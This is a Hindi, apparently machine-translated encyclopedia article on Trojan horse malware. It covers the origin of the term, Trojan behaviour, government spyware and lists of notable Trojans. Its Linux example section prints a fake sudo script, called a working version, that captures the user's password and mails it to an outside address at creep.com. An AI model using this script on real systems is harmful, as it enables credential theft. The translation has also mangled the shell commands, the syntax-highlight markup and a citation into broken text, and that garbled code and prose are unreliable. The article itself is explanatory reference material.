ट्रोजन हॉर्स (कंप्यूटिंग)
एक श्रृंखला का हिस्सा |
कंप्यूटर हैकिंग |
---|
कम्प्यूटिंग में, एक ट्रोजन हॉर्स कोई भी मैलवेयर है जो उपयोगकर्ताओं को उसके वास्तविक इरादे से गुमराह करता है। यह शब्द भ्रामक ट्रोजन हॉर्स की प्राचीन ग्रीक कहानी से लिया गया है जिसके कारण ट्रॉय शहर का पतन हुआ।[1][2][3][4][5] ट्रोजन आमतौर पर सोशल इंजीनियरिंग (सुरक्षा) के किसी रूप से फैलते हैं; उदाहरण के लिए, जहां एक उपयोगकर्ता को अहानिकर दिखने के लिए एक ईमेल अटैचमेंट निष्पादित करने में धोखा दिया जाता है (उदाहरण के लिए, एक नियमित फॉर्म भरने के लिए), या सोशल मीडिया पर या कहीं और किसी नकली विज्ञापन पर क्लिक करके। यद्यपि उनका पेलोड कुछ भी हो सकता है, कई आधुनिक रूप पिछले दरवाजे (कंप्यूटिंग) के रूप में कार्य करते हैं, एक नियंत्रक से संपर्क करते हैं जो प्रभावित कंप्यूटर पर अनधिकृत पहुंच प्राप्त कर सकते हैं।[6] रैंसमवेयर हमले अक्सर ट्रोजन का उपयोग करके किए जाते हैं।
कंप्यूटर वायरस और कंप्यूटर कीड़ा के विपरीत, ट्रोजन आमतौर पर खुद को अन्य फाइलों में इंजेक्ट करने का प्रयास नहीं करते हैं या अन्यथा खुद को प्रचारित नहीं करते हैं।[7]
शब्द का प्रयोग
यह स्पष्ट नहीं है कि कब और कहाँ अवधारणा, और इसके लिए यह शब्द पहली बार इस्तेमाल किया गया था, लेकिन 1971 तक पहले यूनिक्स मैनुअल ने मान लिया था कि इसके पाठक दोनों को जानते हैं:[8]
Also, one may not change the owner of a file with the set—user—ID bit on, otherwise one could create Trojan Horses able to misuse other’s files.
एक और प्रारंभिक संदर्भ 1974 में मॉलटिक्स कंप्यूटर सिस्टम में भेद्यता के विश्लेषण पर अमेरिकी वायु सेना की रिपोर्ट में है।[9] इसे केन थॉम्पसन द्वारा 1983 के अपने ट्यूरिंग अवार्ड स्वीकृति व्याख्यान रिफ्लेक्शंस ऑन ट्रस्टिंग ट्रस्ट में लोकप्रिय बनाया गया था।[10] सबटाइटल: किस हद तक एक बयान पर भरोसा करना चाहिए कि एक प्रोग्राम ट्रोजन हॉर्स से मुक्त है? सॉफ्टवेयर लिखने वाले लोगों पर भरोसा करना शायद ज्यादा जरूरी है। उन्होंने उल्लेख किया कि वे मल्टिक्स की सुरक्षा पर एक रिपोर्ट से ट्रोजन के संभावित अस्तित्व के बारे में जानते थे।[11][12]
व्यवहार
एक बार इंस्टॉल हो जाने पर, ट्रोजन कई प्रकार के दुर्भावनापूर्ण कार्य कर सकते हैं। कई इंटरनेट पर एक या एक से अधिक Botnet#Command and control (C2) सर्वर से संपर्क करते हैं और निर्देश का इंतजार करते हैं। चूंकि व्यक्तिगत ट्रोजन आमतौर पर इस संचार के लिए बंदरगाहों के एक विशिष्ट सेट का उपयोग करते हैं, इसलिए उनका पता लगाना अपेक्षाकृत सरल हो सकता है। इसके अलावा, दुर्भावनापूर्ण कार्रवाई के लिए एक प्रॉक्सी के रूप में इसका उपयोग करते हुए, अन्य मैलवेयर संभावित रूप से ट्रोजन पर कब्जा कर सकते हैं।[13] जर्मन भाषी देशों में, सरकार द्वारा उपयोग किए जाने वाले या बनाए गए स्पाइवेयर को कभी-कभी गोववेयर कहा जाता है। Govware आमतौर पर एक ट्रोजन सॉफ़्टवेयर है जिसका उपयोग लक्ष्य कंप्यूटर से संचार को बाधित करने के लिए किया जाता है। स्विट्ज़रलैंड और जर्मनी जैसे कुछ देशों में इस तरह के सॉफ़्टवेयर के उपयोग को नियंत्रित करने वाला एक कानूनी ढांचा है।[14][15] गोववेयर ट्रोजन के उदाहरणों में स्विस मिनी पैंजर और मेगा पैंजर शामिल हैं[16] और स्टैट्रोजेनर | जर्मन राज्य ट्रोजन उपनाम R2D2।[14]जर्मन गोववेयर आम जनता के लिए अज्ञात सुरक्षा अंतराल का शोषण करके और अन्य अनुप्रयोगों के माध्यम से एन्क्रिप्ट किए जाने से पहले स्मार्टफोन डेटा तक पहुंच बनाकर काम करता है।[17] हैकर्स के बीच बोटनेट की लोकप्रियता और विज्ञापन सेवाओं की उपलब्धता के कारण, जो लेखकों को अपने उपयोगकर्ताओं की गोपनीयता का उल्लंघन करने की अनुमति देती हैं, ट्रोजन अधिक आम होते जा रहे हैं। BitDefender द्वारा जनवरी से जून 2009 तक किए गए एक सर्वेक्षण के अनुसार, ट्रोजन-प्रकार के मैलवेयर बढ़ रहे हैं, जो दुनिया में पाए गए वैश्विक मैलवेयर का 83% हिस्सा है। ट्रोजन का कीड़ों के साथ एक रिश्ता है, क्योंकि वे कीड़े द्वारा दी गई मदद से फैलते हैं और उनके साथ इंटरनेट पर यात्रा करते हैं।[18] बिटडिफेंडर ने कहा है कि लगभग 15% कंप्यूटर एक बॉटनेट के सदस्य हैं, आमतौर पर ट्रोजन संक्रमण द्वारा भर्ती किए जाते हैं।[19]
लिनक्स उदाहरण
ट्रोजन हॉर्स एक कंप्यूटर प्रोग्राम है जो कुछ स्पष्ट कार्य करने का दावा करता है, फिर भी निष्पादन पर यह उपयोगकर्ता की सुरक्षा से समझौता करता है।[20] एक आसान प्रोग्राम Linux sudo कमांड का नया संस्करण है। आदेश को तब सार्वजनिक रूप से लिखने योग्य निर्देशिका में कॉपी किया जाता है /tmp
. यदि कोई व्यवस्थापक उस निर्देशिका में होता है और निष्पादित करता है sudo
, तो ट्रोजन हॉर्स को निष्पादित किया जा सकता है। यहाँ एक कार्यशील संस्करण है:
<वाक्यविन्यास प्रकाश लैंग = श>
- सुडो
- ----
- कैरेक्टर इको को स्क्रीन पर बंद करें।
stty -गूंज
/bin/echo -n `whoami` के लिए पासवर्ड: एक्स पढ़ें /बिन/गूंज
- कैरेक्टर इको को वापस चालू करें।
stty गूंज
प्रतिध्वनि $x | mail -s `whoami` पासवर्ड @creep.com के बाहर नींद 1 गूंज क्षमा करें। आरएम $ 0
बाहर निकलें 0 </वाक्यविन्यास हाइलाइट>
कमांड लाइन आधारित ट्रोजन हॉर्स को रोकने के लिए, सेट करें .
में प्रवेश PATH=
पर्यावरण चर पूंछ के अंत में स्थित होना चाहिए। उदाहरण के लिए: PATH=/usr/local/bin:/usr/bin:.
.
उल्लेखनीय उदाहरण
निजी और सरकारी
- एएनओएम - एफबीआई
- कैओस कंप्यूटर क्लब#Staatstrojaner|0zapftis / r2d2 StaatsTrojaner – DigiTask
- डार्ककॉमेट - सीआईए / एनएसए
- फिनफिशर - लेंच आईटी समाधान / गामा इंटरनेशनल
- हैकिंग टीम# उत्पाद और क्षमताएं | दा विंची / गैलीलियो आरसीएस - हैकिंग टीम
- जादू लालटेन (सॉफ्टवेयर) - एफबीआई
- 2020 यूनाइटेड स्टेट्स फेडरल गवर्नमेंट डेटा ब्रीच - फॉरेन इंटेलिजेंस सर्विस (रूस)आरामदायक भालू (संदिग्ध)
- जरूरत के हिसाब से एक्सेस ऑपरेशंस#क्वांटम अटैक|टीएओ क्वांटम/फॉक्सैसिड - एनएसए
- योद्धा गौरव - जीसीएचक्यू
सार्वजनिक रूप से उपलब्ध
- ईजीएबीटीआर - 1980 के दशक के अंत में
- नेटबस - 1998 (प्रकाशित)[21]
- मोबमैन द्वारा प्रभात - 1999 (प्रकाशित)
- पीछे का छिद्र - 1998 (प्रकाशित)
- बीस्ट (ट्रोजन हॉर्स) - 2002 (प्रकाशित)
- बिफ्रोस्ट (ट्रोजन हॉर्स) - 2004 (प्रकाशित)
- डार्ककॉमेट - 2008-2012 (प्रकाशित)
- ब्लैकहोल शोषण किट - 2012 (प्रकाशित)
- घोस्ट आरएटी - 2009 (प्रकाशित)
- मिनीपैंजर और मेगापैंजर - 2009 (प्रकाशित)[22][23]
- Leurak द्वारा MEMZ - 2016 (प्रकाशित)
सुरक्षा शोधकर्ताओं द्वारा पता लगाया
- बारह टोटके - 1990
- क्लिकबॉट.ए - 2006 (खोजा गया)
- ज़्यूस (ट्रोजन हॉर्स) - 2007 (खोजा गया)
- ट्रोजन बैकडोर। फ्लैशबैक - 2011 (खोजा गया)
- ज़ीरो एक्सेस बॉटनेट - 2011 (खोजा गया)
- कोबफेस - 2008 (खोजा गया)
- चोट - 2009 (खोजा गया)
- कोरफ्लड - 2010 (खोजा गया)
- टिनी बैंकर ट्रोजन - 2012 (खोजा गया)
- सोवा - 2022 (खोजा गया)[24]
- गवाह एंड्रॉइड मैलवेयर - 2015 (खोजा गया)[25][26]Cite error: Closing
</ref>
missing for<ref>
tag[27][28]
पूंजीकरण
कंप्यूटर शब्द ट्रोजन हॉर्स प्राचीन शहर ट्रॉय के प्रसिद्ध ट्रोजन हॉर्स से लिया गया है। इस कारण ट्रोजन को अक्सर पूंजीकृत किया जाता है। हालाँकि, जबकि शैली मार्गदर्शिकाएँ और शब्दकोश भिन्न होते हैं, कई सामान्य उपयोग के लिए लोअर केस ट्रोजन का सुझाव देते हैं।[29][30]
यह भी देखें
- कंप्यूटर सुरक्षा
- कोयल का अंडा (रूपक) | कोयल का अंडा (रूपक)
- साइबर जासूसी
- नाचने वाले सूअर
- शोषण (कंप्यूटर सुरक्षा)
- औद्योगिक जासूसी
- फ़िशिंग
- कम से कम विशेषाधिकार का सिद्धांत
- गोपनीयता-आक्रामक सॉफ्टवेयर
- दूरस्थ प्रशासन
- दूरस्थ प्रशासन सॉफ्टवेयर
- उल्टा कनेक्शन
- दुष्ट सुरक्षा सॉफ्टवेयर
- धोखाधड़ी करने वाले
- तकनीकी सहायता घोटाला
- कंप्यूटर वायरस और वर्म्स की समयरेखा
- ज़ोंबी (कंप्यूटर विज्ञान)
संदर्भ
- ↑ Landwehr, Carl E.; Alan R. Bull; John P. McDermott; William S. Choi (1993). कंप्यूटर प्रोग्राम सुरक्षा दोषों का एक वर्गीकरण, उदाहरण के साथ (PDF). DTIC Document. CiteSeerX 10.1.1.35.997. Archived from the original on April 8, 2013. Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स परिभाषा". Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स". Webopedia. Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स क्या है? - Whatis.com से परिभाषा". Retrieved April 5, 2012.
- ↑ "ट्रोजन हॉर्स: [एमआईटी-हैकर-टर्न-एनएसए-स्पूक डैन एडवर्ड्स द्वारा गढ़ा गया] एन।". Retrieved April 5, 2012.
- ↑ "वायरस, वर्म और ट्रोजन के बीच अंतर". Symantec Security Center. Broadcom Inc. Archived from the original on August 19, 2013. Retrieved March 29, 2020.
- ↑ "वायरस-एल/कंप.वायरस अक्सर पूछे जाने वाले प्रश्न (एफएक्यू) v2.00 (प्रश्न बी3: ट्रोजन हॉर्स क्या है?)". October 9, 1995. Archived from the original on August 5, 2020. Retrieved September 16, 2019.
- ↑ Thompson, Ken; Ritchie, Dennis M. "यूनिक्स प्रोग्रामर मैनुअल, 3 नवम्बर 1971" (PDF). Retrieved March 28, 2020.
- ↑ Karger, P.A.; Schell, R.R., "Multics Security Evaluation: Vulnerability Analysis , ESD-TR-74-193" (PDF), HQ Electronic Systems Division: Hanscom AFB, MA, II
- ↑ Ken Thompson (1984). "ट्रस्टिंग ट्रस्ट पर प्रतिबिंब". Commun. ACM. 27 (8): 761–763. doi:10.1145/358198.358210..
- ↑ Paul A. Karger; Roger R. Schell (2002), "Thirty Years Later: Lessons from the Multics Security Evaluation" (PDF), ACSAC: 119–126
- ↑ Karger et Schell wrote that Thompson added this reference in a later version of his Turing conference: Ken Thompson (November 1989), "On Trusting Trust.", Unix Review, 7 (11): 70–74
- ↑ Crapanzano, Jamie (2003). सबसेवन का विखंडन, पसंद का ट्रोजन हॉर्स (Report). SANS Institute. Retrieved May 10, 2021.
- ↑ 14.0 14.1 Basil Cupa, Trojan Horse Resurrected: On the Legality of the Use of Government Spyware (Govware), LISS 2013, pp. 419–428
- ↑ "अधिकतर पूछे जाने वाले सवाल". Federal Department of Justice and Police. Archived from the original on May 6, 2013.
- ↑ Dunn, John (August 27, 2009). "स्विस कोडर सरकारी जासूस ट्रोजन का प्रचार करता है". TechWorld. Archived from the original on January 26, 2014. Retrieved January 10, 2021.
- ↑ "जर्मन संघीय पुलिस फोन एन्क्रिप्शन से बचने के लिए ट्रोजन वायरस का उपयोग करती है". DW. Retrieved April 14, 2018.
- ↑ "बिटडिफेंडर मालवेयर और स्पैम सर्वेक्षण ई-खतरे को ऑनलाइन व्यवहार प्रवृत्तियों के अनुकूल पाता है". BitDefender. Archived from the original on August 8, 2009. Retrieved March 27, 2020.
- ↑ Datta, Ganesh (August 7, 2014). "ट्रोजन क्या होते हैं?". SecurAid. Archived from the original on August 12, 2014. Retrieved March 27, 2020.
- ↑ Wood, Patrick H.; Kochan, Stephen G. (1985). यूनिक्स प्रणाली सुरक्षा. Hayden Books. p. 42. ISBN 0-8104-6267-2.
- ↑ Seth, Kulakow (1998). "क्या यह अभी भी एक ट्रोजन हॉर्स या वास्तविक वैध रिमोट कंट्रोल एडमिनिस्ट्रेशन टूल है?" (Report). SANS Institute. Retrieved May 10, 2021.
- ↑ "मेगा पैंजर". SourceForge.
- ↑ "मिनी टैंक". SourceForge.
- ↑ "सोवा वायरस क्या है?". India Today.
- ↑ "ट्रोजनाइज्ड एडवेयर परिवार जो भी ऐप चाहता है उसे इंस्टॉल करने के लिए एक्सेसिबिलिटी सेवा का दुरुपयोग करता है - लुकआउट ब्लॉग".
- ↑ Neal, Dave (November 20, 2015). "शेडुन ट्रोजन एडवेयर एंड्रॉइड एक्सेसिबिलिटी सर्विस को हिट कर रहा है". The Inquirer. Incisive Business Media. Archived from the original on November 22, 2015. Retrieved March 27, 2020.
{{cite web}}
: CS1 maint: unfit URL (link) - ↑ Times, Tech (November 9, 2015). "एंड्रॉइड मालवेयर का नया परिवार हटाना वस्तुतः असंभव है: शेडुन, शुएनेट और शिफ्टीबग को नमस्ते कहें".
- ↑ "एंड्रॉइड एडवेयर खुद को तब भी इंस्टॉल कर सकता है जब उपयोगकर्ता स्पष्ट रूप से इसे अस्वीकार कर दें". November 19, 2015.
- ↑ "ट्रोजन". Collins Advanced Dictionary. Retrieved March 29, 2020.
- ↑ "ट्रोजन हॉर्स". Microsoft Style Guide. Microsoft. Retrieved March 29, 2020.
इस पेज में लापता आंतरिक लिंक की सूची
- प्राचीन यूनानी
- मिनीपैंजर और मेगापैंजर
- विदेशी खुफिया सेवा (रूस)
- एनोम
- ेगाबत्र
- घो0स्त चूहा
- बिफ्रॉस्ट (ट्रोजन हॉर्स)
- जानवर (ट्रोजन हॉर्स)
- ज़ीउस (ट्रोजन हॉर्स)
- जीरो एक्सेस बॉटनेट
- शैली गाइड
बाहरी संबंध
- Media related to Trojan horse (malware) at Wikimedia Commons
- "CERT Advisory CA-1999-02 Trojan Horses" (PDF). Carnegie Mellon University Software Engineering Institute. Archived from the original on October 17, 2000. Retrieved September 15, 2019.